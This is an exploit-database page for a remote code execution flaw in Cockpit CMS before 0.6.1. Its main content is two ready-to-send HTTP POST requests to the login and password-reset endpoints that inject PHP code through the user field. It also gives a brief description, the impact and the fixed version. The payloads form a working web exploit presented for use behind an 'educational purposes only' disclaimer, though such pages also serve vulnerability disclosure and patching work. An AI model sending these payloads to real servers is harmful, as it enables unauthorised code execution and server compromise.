Cockpit cms 0.6.1 remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-07 | Type : webapps | Platform : php
This exploit / vulnerability Cockpit cms 0.6.1 remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login
POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com

{"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset
POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Origin: https://example.com

{"user":"test'.phpinfo().'"}

## Impact
Allows attackers to execute malicious codes to get access to the server.

## Fix
Update to versions >= 0.6.1

Cockpit cms 0.6.1 remote code execution


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Cockpit cms 0.6.1 remote code execution Vulnerability / Exploit